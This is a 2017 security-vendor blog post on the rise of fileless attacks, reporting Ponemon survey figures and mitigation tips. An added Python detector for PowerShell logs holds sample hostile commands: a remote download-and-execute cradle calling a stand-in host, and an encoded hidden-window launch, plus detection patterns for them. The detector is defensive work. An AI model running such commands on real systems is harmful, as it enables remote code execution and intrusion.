Stats & Trends
Jonathan Crowe
Nov 2017

Fileless Attack Techniques Used in Majority of Successful Hacks


According to a new study from the Ponemon Institute, 77 percent of successful compromises involved fileless techniques.

To discover how cyber attacks are evolving and how organizations are attempting to adapt, Barkly recently teamed up with the Ponemon Institute, who independently surveyed 665 IT security professionals responsible for managing and reducing their organization’s security risk.

According to the survey findings, seven out of 10 organizations have experienced a significant increase in endpoint security risk during the past 12 months. Corresponding with that increase is a rise in “fileless” attacks: attacks that avoid dropping malicious executable files and instead rely on exploits, scripts, or otherwise legitimate system administration tools.

What constitutes a fileless attack?

A fileless attack is an attack that avoids downloading malicious executable files at one or multiple stages by using exploits, scripts, or legitimate system tools, instead.

Why attackers use fileless techniques

Rather than install malicious executable files that antivirus solutions can scan and block, the attacks that are most often compromising organizations are instead leveraging exploits designed to run malicious code or launching scripts directly from memory, infecting endpoints without leaving easily-discoverable artifacts behind.

Once an endpoint has been compromised, these attacks can also abuse legitimate system administration tools and processes to gain persistence, elevate privileges, and spread laterally across the network.

Respondents estimated that 29 percent of the attacks they faced during 2017 were fileless, up from 20 percent the year before. They also expect that proportion to keep rising, with fileless attacks projected to make up 35 percent of all attacks in 2018.


Why the uptick? In short, fileless attacks are working. According to the responses, 42 percent of companies experienced one or more fileless attacks that successfully compromised their data or IT infrastructure in 2017. In fact, over three-quarters of reported successful compromises involved fileless techniques.


Result: Antivirus solutions are being replaced or supplemented 

The success of fileless attacks has further eroded organizations’ trust in their existing security solutions. Less than a third of respondents believe their antivirus (AV) can stop the threats they are seeing. As a result, the vast majority are investing in new technology.

4 out of 5 organizations replaced or augmented their existing antivirus solution in 2017.


One third of respondents reported they had replaced their AV with another vendor’s AV or a next-generation endpoint solution. Half of the organizations reported they had kept their existing AV and added solutions with either additional protection or detection and response capabilities.

Despite the addition of new technologies, only 54 percent of survey respondents indicated they believed the attacks they’re seeing can be realistically stopped.

5 tips for mitigating the risk of fileless attacks

The good news is there are several practical things you can do now to reduce your organization's susceptibility to fileless attack techniques: 

  1. Block activity, not just file signatures: With no files to scan, detecting and blocking these attacks comes down to being able to identify malicious behaviors before damage is done. If you have the staff and resources to handle it, enabling and monitoring extended PowerShell logging can help you identify suspicious scripts. Alternatively, solutions like Barkly can help you proactively block malicious scripts automatically.  

  2. Beware macros: Warn users to be extremely wary of Microsoft Office documents that prompt them to enable macros (or "enable content"), and utilize endpoint protection that blocks malicious macros before they can execute. Speaking of Microsoft Office, make sure you've taken measures to block DDE attacks, too. 

  3. Disable system admin tools you don't use: The liability they present simply isn't worth it. First and foremost on the list is PowerShell. If disabling PowerShell isn't a realistic option, consider using Constrained Language Mode to limit PowerShell to basic functionality, which makes many fileless attack techniques unusable.

  4. Always be patching: And when you can't patch, isolate. 

  5. Practice the principle of least privilege: Ensure that user access and privileges are limited to the bare minimum they absolutely need. Microsoft's Just Enough Administration technology can help. 
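As an added example of what the first tip's "monitoring extended PowerShell logging" can look like in practice (this is not Barkly's code or part of the original post): a small Python triage routine that scores the ScriptBlockText of constructed Event ID 4104 records, decoding any -EncodedCommand argument so the heuristics also see the payload. The rule set, weights and alert threshold are illustrative assumptions.

```python
import base64
import re

# Constructed sample records shaped like PowerShell Script Block Logging
# events (Event ID 4104, ScriptBlockText). Not real logs; the base64 payload
# decodes to the harmless UTF-16LE string "IEX (New-Object".
SAMPLE_EVENTS = [
    {"id": 4104, "text": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"id": 4104, "text": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"id": 4104, "text": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 4104, "text": "Get-Service | Where-Object Status -eq 'Running'"},
]

ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# Defender-side heuristics as (rule name, pattern, weight). The weights are
# illustrative assumptions, not a published scoring scheme.
RULES = [
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|WebClient", re.I), 2),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("encoded_command", ENCODED_ARG, 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I), 1),
]

def decode_encoded_command(text):
    """Return the UTF-16LE plaintext of an -EncodedCommand argument, or ""."""
    m = ENCODED_ARG.search(text)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""

def score_script_block(text):
    """Scan the raw text and its decoded payload; return (score, hit names)."""
    views = [v for v in (text, decode_encoded_command(text)) if v]
    hits = [name for name, rx, _ in RULES if any(rx.search(v) for v in views)]
    return sum(w for name, _, w in RULES if name in hits), hits

def triage(events, threshold=3):
    """Return the 4104 events whose heuristic score reaches the threshold."""
    alerts = []
    for ev in events:
        if ev["id"] != 4104:
            continue
        score, hits = score_script_block(ev["text"])
        if score >= threshold:
            alerts.append({"text": ev["text"], "score": score, "hits": hits})
    return alerts
```

Running `triage(SAMPLE_EVENTS)` flags only the download cradle and the encoded, hidden-window launch; the two ordinary administrative commands score zero.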

Based on the Ponemon research, it's clear organizations can benefit from endpoint security solutions specifically designed to block fileless attacks, which are responsible for the majority of today’s successful compromises. To restore faith in endpoint security’s effectiveness, however, these new solutions need to address this crucial gap in protection without adding unnecessary complexity to endpoint management. 

Find out how we've built Barkly to do just that. See how it works.

Looking for more stats on fileless attacks and the current state of endpoint security? Download Ponemon's 2017 State of Endpoint Security Risk report.

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical perspective.
